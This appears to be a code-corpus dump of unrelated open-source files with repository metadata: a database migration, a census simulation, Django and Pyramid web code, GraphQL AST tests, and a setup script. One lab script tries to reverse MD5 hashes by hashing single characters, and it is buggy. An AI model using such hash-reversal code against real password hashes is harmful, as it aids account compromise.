sa.Column('id', sa.Integer(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('username', sa.String(length=100), nullable=False),
sa.Column('password', sa.String(length=100), nullable=False),
sa.Column('token', sa.String(length=100), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('user_id'),
schema='user'
)
op.create_table(
'image',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('image', sa.Text(), nullable=False),
sa.Column('width', sa.Integer(), nullable=True),
sa.Column('height', sa.Integer(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('image', schema='user')
op.drop_table('account', schema='user')
op.drop_table('user', schema='user')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
af2ce57e29ae463e1877eb93020a815ea4ffd575 | 921a8ebd5add1cd15db7e558801bf6f5167073d7 | /hq.py | d9093527875528007031eec0e0b09be2fde29b71 | [] | no_license | ONSdigital/FOCUS | 768a5713ec8909cbcdb6b6af882879dda0647576 | d6920bf036abb49872a1f4908fdfdff8135c0f68 | refs/heads/master | 2021-09-03T20:02:07.212625 | 2017-11-13T16:39:54 | 2017-11-13T16:39:54 | 50,437,640 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,091 | py | """Module used to store the classes and other code related to any aspect of the census hq operation"""
import output_options as oo
import helper as h
import datetime
from simpy.util import start_delayed
import math
def ret_rec(household, rep):
# print out every 100000 returns?
#if rep.total_responses % 100000 == 0:
#print(rep.total_responses)
if oo.record_active_summary:
# add household to summary of responses
for key, value in rep.active_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_totals.items():
value[str(getattr(household, key))] += 1
if oo.record_active_paper_summary and not household.digital:
for key, value in rep.active_paper_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_paper_totals.items():
value[str(getattr(household, key))] += 1
household.return_received = True
if oo.record_return_received:
rep.output_data['Return_received'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# currently every return gets counted as a response as soon as it is received - this may need to change
household.responded = True
rep.total_responses += 1
household.district.total_responses += 1
# check size of output data - if over an amount, size or length write to file?
if oo.record_responded:
rep.output_data['Responded'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# checks size of output and writes to file if too large
if (h.dict_size(rep.output_data)) > rep.max_output_file_size:
h.write_output(rep.output_data, rep.output_path, rep.run)
yield rep.env.timeout(0)
# so returned and we know it! remove from simulation??
class Adviser(object):
"""Call centre adviser"""
def __init__(self, rep, id_num, input_data, ad_type):
self.rep = rep
self.id_num = id_num
self.input_data = input_data
self.type = ad_type
# date range in datetime format
self.start_date = datetime.datetime.strptime(self.input_data['start_date'], '%Y, %m, %d').date()
self.end_date = datetime.datetime.strptime(self.input_data['end_date'], '%Y, %m, %d').date()
# date range in simpy format
self.start_sim_time = h.get_entity_time(self, "start") # the sim time the adviser starts work
self.end_sim_time = h.get_entity_time(self, "end") # the sim time the adviser ends work
# time range - varies by day of week
self.set_avail_sch = input_data['availability']
class LetterPhase(object):
def __init__(self, env, rep, district, input_data, letter_type):
self.env = env
self.rep = rep
self.district = district
self.input_data = input_data
self.letter_type = letter_type
self.blanket = h.str2bool(self.input_data["blanket"])
self.targets = self.input_data["targets"]
self.start_sim_time = h.get_event_time(self)
self.period = self.input_data["period"]
# add process to decide who to send letters too...but with a delay
start_delayed(self.env, self.fu_letter(), self.start_sim_time)
def fu_letter(self):
temp_letter_list = [household for household in self.district.households
if (not self.blanket and household.hh_type in self.targets and not household.responded) or \
(self.blanket and household.hh_type in self.targets)]
# order by priority
temp_letter_list.sort(key=lambda hh: hh.priority, reverse=False)
for i in range(self.period):
current_letter_day = temp_letter_list[i::self.period]
for household in current_letter_day:
add_delay = i * 24
if self.letter_type == 'pq':
household.paper_allowed = True
if oo.record_paper_summary:
# add to the summary of the amount of paper given
for key, value in self.rep.paper_summary.items():
value[str(getattr(household, key))][math.floor((self.env.now + add_delay) / 24)] += 1
for key, value in self.rep.paper_totals.items():
value[str(getattr(household, key))] += 1
self.env.process(self.co_send_letter(household, self.letter_type, self.input_data["delay"] + add_delay))
yield self.env.timeout(0)
def co_send_letter(self, household, letter_type, delay):
if oo.record_letters:
self.rep.output_data[letter_type + '_sent'].append(oo.generic_output(self.rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
self.env.now))
yield self.env.timeout(delay)
self.env.process(household.receive_reminder(letter_type))
def schedule_paper_drop(obj, contact_type, reminder_type, delay):
# add to summary of paper given out
if reminder_type == 'pq' and oo.record_paper_summary:
for key, value in obj.rep.paper_summary.items():
value[str(getattr(obj, key))][math.floor(obj.rep.env.now / 24)] += 1
for key, value in obj.rep.paper_totals.items():
value[str(getattr(obj, key))] += 1
output_type = contact_type + "_" + reminder_type + "_posted" # use this as output key
if oo.record_posted:
obj.rep.output_data[output_type].append(oo.generic_output(obj.rep.reps,
obj.district.district,
obj.la,
obj.lsoa,
obj.digital,
obj.hh_type,
obj.hh_id,
obj.env.now))
if delay > 0:
start_delayed(obj.env, obj.receive_reminder(reminder_type), delay)
else:
obj.env.process(obj.receive_reminder(reminder_type))
yield obj.env.timeout(0)
| [
"[email protected]"
] | |
218c3c740337ecd6f019cf07d45326d26a037866 | 2437f5e7f243ccf712f94b08f272b7d5387f90cf | /dailyfresh/apps/cart/urls.py | a7e68618919bfccd6fe10436169f4b05ec0e1449 | [] | no_license | KWTsoftkitty/pyCode | b06b128292a2c64e5552c495087693bdd01042c4 | fffa66737ca9ba29b296245767eea8af3ee769d6 | refs/heads/master | 2020-03-25T20:46:45.163930 | 2019-08-30T08:40:27 | 2019-08-30T08:40:27 | 144,145,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | from django.conf.urls import url
from cart.views import CartInfoView, CartAddView, CartUpdateView, CartDeleteView
urlpatterns = [
url(r'^show$', CartInfoView.as_view(), name='show'), # 购物车页面显示
url(r'^add$', CartAddView.as_view(), name='add'), # 购物车添加
url(r'^update$', CartUpdateView.as_view(), name='update'), # 购物车更新
url(r'^delete$', CartDeleteView.as_view(), name='delete'), # 删除购物车记录
]
| [
"[email protected]"
] | |
c705c0b17acc935c371cb01c2c106b884fe5ba24 | fdbcef18ee57e350619cba7a0aa430f2bc832dcb | /scalingqa/retriever/hit_processing.py | 8611e4252ec2a8e158ff56bb0bcca96c1b8be205 | [
"MIT"
] | permissive | Ankur3107/scalingQA | 5091f14bf14f53fbe198287e34d8c0376e40cdc8 | f648e34a9e4d7d4dbc2549a3c8767b6a25e3c447 | refs/heads/main | 2023-04-17T20:03:40.661471 | 2021-04-22T05:28:30 | 2021-04-22T05:28:30 | 360,213,015 | 0 | 0 | MIT | 2021-04-22T05:28:31 | 2021-04-21T15:08:34 | Python | UTF-8 | Python | false | false | 2,149 | py | import re
from ..common.drqa_tokenizers.simple_tokenizer import SimpleTokenizer
from ..common.utility.metrics import normalize
dpr_tokenizer = None
def process_hit_token_dpr(e, db, match_type="string"):
global dpr_tokenizer
if dpr_tokenizer is None:
dpr_tokenizer = SimpleTokenizer()
def regex_match(text, pattern):
"""Test if a regex pattern is contained within a text."""
try:
pattern = re.compile(
pattern,
flags=re.IGNORECASE + re.UNICODE + re.MULTILINE,
)
except BaseException:
return False
return pattern.search(text) is not None
def has_answer(answers, text, tokenizer, match_type) -> bool:
"""Check if a document contains an answer string.
If `match_type` is string, token matching is done between the text and answer.
If `match_type` is regex, we search the whole text with the regex.
"""
text = normalize(text)
if match_type == 'string':
# Answer is a list of possible strings
text = tokenizer.tokenize(text).words(uncased=True)
for single_answer in answers:
single_answer = normalize(single_answer)
single_answer = tokenizer.tokenize(single_answer)
single_answer = single_answer.words(uncased=True)
for i in range(0, len(text) - len(single_answer) + 1):
if single_answer == text[i: i + len(single_answer)]:
return True
elif match_type == 'regex':
# Answer is a regex
for single_answer in answers:
single_answer = normalize(single_answer)
if regex_match(text, single_answer):
return True
return False
top, answers, raw_question = e
if type(top) != list:
top = top.tolist()
for rank, t in enumerate(top):
text = db.get_doc_text(t)[0]
if has_answer(answers, text, dpr_tokenizer, match_type):
return {"hit": True, "hit_rank": rank}
return {"hit": False, "hit_rank": -1}
| [
"[email protected]"
] | |
ee0ea350d13c32438c662a8a258423d9b8287956 | 20c4a239e000b15131251d372ccad9110063a961 | /setup.py | 91ea45b7093ebde7a34cf7d5eb933f7529893fdf | [
"MIT"
] | permissive | Partidani/hdlConvertor | 9d0e382e6e087ac240502538b63f8667004a7715 | 36d3b58e2641e39c323ed9ee337135e49c64d076 | refs/heads/master | 2023-04-06T00:03:31.505727 | 2021-04-19T07:28:25 | 2021-04-19T07:28:25 | 366,418,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
from setuptools import find_packages
try:
from skbuild import setup
except ImportError:
raise ImportError("Missing scikit-build, (should be automatically installed by pip)")
import sys
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, "README.md")) as f:
long_description = f.read()
deps = ["typing", "future"] if sys.version_info[0] == 2 else []
setup(
cmake_args=[
# '-DCMAKE_BUILD_TYPE=Debug'
],
name='hdlConvertor',
version='2.2',
description='VHDL and System Verilog parser written in c++',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Nic30/hdlConvertor',
author='Michal Orsak',
author_email='[email protected]',
keywords=['hdl', 'vhdl', 'verilog', 'system verilog',
'parser', 'preprocessor', 'antlr4'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Topic :: Software Development :: Build Tools',
'Programming Language :: C++',
'Programming Language :: Cython',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',
],
install_requires=[
'hdlConvertorAst>=0.7',
] + deps,
license="MIT",
packages=find_packages(exclude=["tests", ]),
test_suite="tests.main_test_suite",
test_runner="tests:TimeLoggingTestRunner",
tests_require=deps,
)
| [
"[email protected]"
] | |
1f1e7a0b4abdeaaf41b0249eee3816924a031f17 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/traversal_basics/trav10.py | a31652b349cd80bc1656caffb5760ac4bffff3db | [] | no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,373 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
################################################################################
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from string import Template
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.location import lineage
"""
from pyramid.httpexceptions import HTTPFound
#################################
# make a new Document
#
title = appstruct['title']
body = appstruct['body']
name = str(randint(0, 999999))
new_document = Document(name, self.context, title, body)
self.context[name] = new_document
######################################
# Redirect to the new document
#
url = self.request.resource_url(new_document)
return HTTPFound(location=url)
"""
class Folder(OrderedDict):
def __init__(self, name, parent, title):
super(Folder, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
class Document(object):
def __init__(self, name, parent, title, body):
self.__name__ = name
self.__parent__ = parent
self.title = title
self.body = body
class SiteFolder(Folder):
pass
class Collector(Folder):
def __init__(self, *args, **kwds):
super(Collector, self).__init__(*args, **kwds)
self.toysList = []
class Toy(object):
__slots__ = ('__name__', '__parent__',
'title', 'description', 'tag')
def __init__(self, data, parent):
self.__name__ = data['title']
self.__parent__ = parent
self.title = data['title']
self.description = data['description']
self.tag = data['tag']
class SimpleDB(OrderedDict):
def __init__(self, name, parent, title):
super(SimpleDB, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
def __getitem__(self, key):
print 'need key = %s' % key
try:
item = super(SimpleDB, self).__getitem__(key)
except KeyError:
print 'Key %s error!' % (key,)
print 'Generating new Bear toy with key %s' % (key,)
newtoy = {'title': u'Generated Bear %s' % (key,),
'description': u'Generated description for Bear %s' % (key,),
'tag': u'bears'}
item = Toy(data = newtoy,
parent = switchcollector[newtoy['tag']])
# save generated toy
self[key] = item
# update collector for Bears
collector1.toysList.insert(0, key)
return item
def __setitem__(self, key, value):
print 'saving %s to key %s' % (value, key)
super(SimpleDB, self).__setitem__(key, value)
def get_root(request):
return RTREE
def view_site(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Site folder</title>
</head>
<body>
<h3>title: $title</h3>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_folder(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Folder $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_collector(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Collector $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<h3>Toys:</h3>
$toys
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
toys = getToysTableLinks(context, request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_doc(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Document $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<p>body: $body</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
body = context.body)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_db(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Database $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_toy(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Toy $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>Title: $title</h3>
<h3>Tag: $tag</h3>
<h3>Description:</h3>
<p>$descr</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
descr = context.description,
tag = context.tag)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def getBreadCrumbs(request):
cr = [(request.resource_url(i), i.title) for i in lineage(request.context)]
cr.reverse()
li = ['<li>' + '<a href="' + i[0] + '">' + i[1] + '</a></li>'
for i in cr[:-1]]
#last item of breadcrumbs
li.append('<li>' + cr[-1][1] + '</li>')
return "<ul>" + "\n".join(li) + "</ul>"
def getFolderLeaves(request):
leaves = request.context.items()
li = ['<li>' + '<a href="' + request.resource_url(i[1]) + '">' + i[0] +
'</a></li>' for i in leaves]
return "<ul>" + "\n".join(li) + "</ul>"
def getToysList(collector):
if collector.toysList:
return collector.toysList
else:
return []
def getToysTable(collector):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td>%s</td>" % i)
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def getToysTableLinks(collector, request):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td><a href=\"/db/%s\">%s</a></td>" % (i, i))
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def fillCollector(collector, tag, db):
lst = []
data = db.items()
for (k, v) in data:
if v['tag'] == tag:
lst.append(k)
collector.toysList.extend(lst)
def printinfo(context, request):
# print request.__dict__
formatstring ='%-36s%s'
print formatstring % ('request.url', request.url)
print formatstring % ('request.host', request.host)
print formatstring % ('request.host_url', request.host_url)
print formatstring % ('request.application_url', request.application_url)
print formatstring % ('request.path_url', request.path_url)
print formatstring % ('request.path', request.path)
print formatstring % ('request.path_qs', request.path_qs)
print formatstring % ('request.query_string', request.query_string)
print 10 * '-'
# print formatstring % ('request.matchdict', request.matchdict)
### need a name attribute
# print formatstring % ('request.resource_url(context)', request.resource_url(context))
print formatstring % ('request.cookies', request.cookies)
print formatstring % ('request.headers', request.headers)
# print formatstring % ('request.json', request.json)
print formatstring % ('request.method', request.method)
print formatstring % ('request.charset', request.charset)
if request.params:
print formatstring % ('request.params', request.params)
print formatstring % ('request.params.keys()', request.params.keys())
print formatstring % ('request.params.items()', request.params.items())
        # getone() raises an error if several 'age' parameters were passed
# print formatstring % ('request.params.getone(\'age\')', request.params.getone('age'))
print formatstring % ('request.params.getall(\'age\')', request.params.getall('age'))
print 60 * '='
print 'context info'
print
for i in context:
print i, context[i]
print 60 * '='
print 'URL parameters'
################
# resources tree
#
RTREE = SiteFolder('', None, u'Site folder')
folder1 = Folder(u'f1', RTREE, u'Folder one')
RTREE[u'f1'] = folder1
folder2 = RTREE[u'f2'] = Folder(u'f2', RTREE, u'Folder two')
folder3 = RTREE[u'f3'] = Folder(u'f3', RTREE, u'Folder три')
folder4 = folder3[u'f4'] = Folder(u'f4', folder3, u'Folder #4')
d1 = Document(name=u'd1',
parent=folder1,
title=u'Testing document 1',
body=u'Body of testing document 1')
folder1[u'd1'] = d1
# main toys collector
collector = RTREE[u'toys'] = Folder(u'toys', RTREE, u'Toys')
collector1 = collector[u'bears'] = Collector(u'bears', collector, u'Bears')
collector2 = collector[u'dolls'] = Collector(u'dolls', collector, u'Dolls')
collector3 = collector[u'angels'] = Collector(u'angels', collector, u'Angels')
collector4 = collector[u'test'] = Collector(u'test', collector, u'Testing')
simpledb = RTREE[u'db'] = SimpleDB(u'db', RTREE, u'SimpleDB')
PSEUDO_DB = {
1: {'title': u'Bear 1', 'description': u'Description of Bear 1', 'tag': u'bears'},
2: {'title': u'Doll 2', 'description': u'Description of Doll 2', 'tag': u'dolls'},
3: {'title': u'Doll 3', 'description': u'Description of Doll 3', 'tag': u'dolls'},
4: {'title': u'Bear 4', 'description': u'Description of Bear 4', 'tag': u'bears'},
5: {'title': u'Doll 5', 'description': u'Description of Doll 5', 'tag': u'dolls'},
6: {'title': u'Angel 6', 'description': u'Description of Angel 6', 'tag': u'angels'},
7: {'title': u'Doll 7', 'description': u'Description of Doll 7', 'tag': u'dolls'},
8: {'title': u'Doll 8', 'description': u'Description of Doll 8', 'tag': u'dolls'},
9: {'title': u'Bear 9', 'description': u'Description of Bear 9', 'tag': u'bears'},
10: {'title': u'Angel 10', 'description': u'Description of Angel 10', 'tag': u'angels'},
11: {'title': u'Angel 11', 'description': u'Description of Angel 11', 'tag': u'angels'},
12: {'title': u'Angel 12', 'description': u'Description of Angel 12', 'tag': u'angels'},
13: {'title': u'Angel 13', 'description': u'Description of Angel 13', 'tag': u'angels'},
14: {'title': u'Bear 14', 'description': u'Description of Bear 14', 'tag': u'bears'},
15: {'title': u'Bear 15', 'description': u'Description of Bear 15', 'tag': u'bears'},
16: {'title': u'Angel 16', 'description': u'Description of Angel 16', 'tag': u'angels'},
17: {'title': u'Test 17', 'description': u'Description of Test 17', 'tag': u'test'},
18: {'title': u'Test 18', 'description': u'Description of Test 18', 'tag': u'test'},
19: {'title': u'Doll 19', 'description': u'Description of Doll 19', 'tag': u'dolls'},
20: {'title': u'Test 20', 'description': u'Description of Test 20', 'tag': u'test'},
21: {'title': u'Angel 21', 'description': u'Description of Angel 21', 'tag': u'angels'},
22: {'title': u'Bear 22', 'description': u'Description of Bear 22', 'tag': u'bears'},
23: {'title': u'Test 23', 'description': u'Description of Test 23', 'tag': u'test'},
24: {'title': u'Doll 24', 'description': u'Description of Doll 24', 'tag': u'dolls'},
25: {'title': u'Doll 25', 'description': u'Description of Doll 25', 'tag': u'dolls'},
26: {'title': u'Test 26', 'description': u'Description of Test 26', 'tag': u'test'},
27: {'title': u'Bear 27', 'description': u'Description of Bear 27', 'tag': u'bears'},
28: {'title': u'Test 28', 'description': u'Description of Test 28', 'tag': u'test'},
29: {'title': u'Angel 29', 'description': u'Description of Angel 29', 'tag': u'angels'},
30: {'title': u'Test 30', 'description': u'Description of Test 30', 'tag': u'test'},
31: {'title': u'Doll 31', 'description': u'Description of Doll 31', 'tag': u'dolls'},
}
###########################################################################
if __name__ == '__main__':
config = Configurator(root_factory=get_root)
config.add_view(view=view_site,
context=SiteFolder)
config.add_view(view=view_folder,
context=Folder)
config.add_view(view=view_collector,
context=Collector)
config.add_view(view=view_doc,
context=Document)
config.add_view(view=view_db,
context=SimpleDB)
config.add_view(view=view_toy,
context=Toy)
# filling collectors of toys
fillCollector(collector1, u'bears', PSEUDO_DB)
fillCollector(collector2, u'dolls', PSEUDO_DB)
fillCollector(collector3, u'angels', PSEUDO_DB)
fillCollector(collector4, u'test', PSEUDO_DB)
########################################
# initialize database
switchcollector = {u'bears': collector1,
u'dolls': collector2,
u'angels': collector3,
u'test': collector4}
for (k, v) in PSEUDO_DB.items():
simpledb[str(k)] = Toy(data = v,
parent = switchcollector[v['tag']])
app = config.make_wsgi_app()
server = make_server('0.0.0.0', 8080, app)
server.serve_forever()
| [
"[email protected]"
] | |
12431f449479c4225d285315b7a3bb921570c910 | efcd21234f3291e8fc561f49a7c88fc57a63e952 | /tests/unit/language/ast/test_directive_definition.py | b356575d34de9eab8e68c11d4445ef82a42fc23c | [
"MIT"
] | permissive | tartiflette/tartiflette | 146214a43847d2f423bf74594643c1fdefc746f1 | 421c1e937f553d6a5bf2f30154022c0d77053cfb | refs/heads/master | 2023-09-01T02:40:05.974025 | 2022-01-20T14:55:31 | 2022-01-20T14:55:31 | 119,035,565 | 586 | 39 | MIT | 2023-09-11T07:49:27 | 2018-01-26T09:56:10 | Python | UTF-8 | Python | false | false | 6,673 | py | import pytest
from tartiflette.language.ast import DirectiveDefinitionNode
def test_directivedefinitionnode__init__():
directive_definition_node = DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
)
assert directive_definition_node.name == "directiveDefinitionName"
assert (
directive_definition_node.locations == "directiveDefinitionLocations"
)
assert (
directive_definition_node.description
== "directiveDefinitionDescription"
)
assert (
directive_definition_node.arguments == "directiveDefinitionArguments"
)
assert directive_definition_node.location == "directiveDefinitionLocation"
@pytest.mark.parametrize(
"directive_definition_node,other,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
Ellipsis,
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionNameBis",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocationsBis",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescriptionBis",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArgumentsBis",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocationBis",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
True,
),
],
)
def test_directivedefinitionnode__eq__(
directive_definition_node, other, expected
):
assert (directive_definition_node == other) is expected
@pytest.mark.parametrize(
"directive_definition_node,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
"DirectiveDefinitionNode("
"description='directiveDefinitionDescription', "
"name='directiveDefinitionName', "
"arguments='directiveDefinitionArguments', "
"locations='directiveDefinitionLocations', "
"location='directiveDefinitionLocation')",
)
],
)
def test_directivedefinitionnode__repr__(directive_definition_node, expected):
assert directive_definition_node.__repr__() == expected
| [
"[email protected]"
] | |
0d98db9ec83456db136f54a759d5de5a9a1ccb42 | c42b08296e47e113ea66d8d14b383abccfbce409 | /myhashtry.py | 877c1cafe1784c183cfe3f85b83929bd081b06e3 | [] | no_license | unmutilated/code | 49750a92ec855158740f456b3b1d3dd34890ca88 | 8961e5cf394aecdf71d70cc6b2ff03f35de14db5 | refs/heads/master | 2022-05-24T13:14:37.318698 | 2020-04-27T20:11:08 | 2020-04-27T20:11:08 | 259,436,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,308 | py | import sys
import hashlib
Output = []
def ReadFile():
file0 = open("CRY_Lab_02_B_hashes.txt", "r")
    lines = file0.readlines()
file0.close()
s = set()
for data in lines:
s.add(data.strip())
print("Read in {0} lines from the MD5 hash file".format(len(lines)))
return s
def SaveFile():
file1 = open("Output.txt","w")
file1.writelines(Output)
    file1.close()
def HashFind():
hashset = ReadFile()
alph = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@"
count = 0
for element in range(0, len(alph)):
m = alph[element]
print(element) #for debuggig
print(len(alph)) #for debugging
h = hashlib.md5(m.encode()).hexdigest()
if h in hashset:
Output.append("{0} Found a hash: {1} hashes to {2}\n".format(count, m, h))
count = count +1
if count >= 1000:
print("All Done")
SaveFile()
sys.exit()
else:
sys.exit()
if __name__ == "__main__":
while True:
userchoice = input("to hash press h [Enter to quit]: ").upper()
if userchoice.startswith("H"):
HashFind()
else:
sys.exit()
| [
"[email protected]"
] | |
8489d3ddbd733e3678c75d8fcdde182f1b735194 | 60fd4409e031a18bbd65e37d2f7d4d05dcb65caa | /Python/代码实现/day02-多线程进程/13-多线程共享全局变量.py | f28f64bf29e1650b3a00ab9cb41fda8ebe34f421 | [] | no_license | YaoFANGUK/Practice-Code | 1e05310773f9d19f54c2d0197cd613c75defc38c | 01ee0c3f24d505c4fab5b82c52b545933871b950 | refs/heads/master | 2021-06-19T17:02:16.814441 | 2021-06-04T03:38:39 | 2021-06-04T03:38:39 | 222,544,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | # join: 主线程等待add_thread执行完成,再继续向下执行
# 结论:线程之间可以共享全局变量
| [
"[email protected]"
] | |
3273285dc5118a47952c40dfdd26e29bd612aa47 | 46f03a8353b3fd0cd1ca35e0d322c4a53649596b | /try.py | 193887977e7feaeaa8f466637561399d7a348948 | [] | no_license | dragikamov/Video_Converter | d7d73a948853c99840606b89fc79dbcf8e1bde97 | e0233f9c190618e30bb85bcfa9df881f0eee058e | refs/heads/master | 2020-04-30T15:50:35.037923 | 2019-03-30T22:35:29 | 2019-03-30T22:35:29 | 176,931,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,925 | py | import cv2
import numpy as np
import os
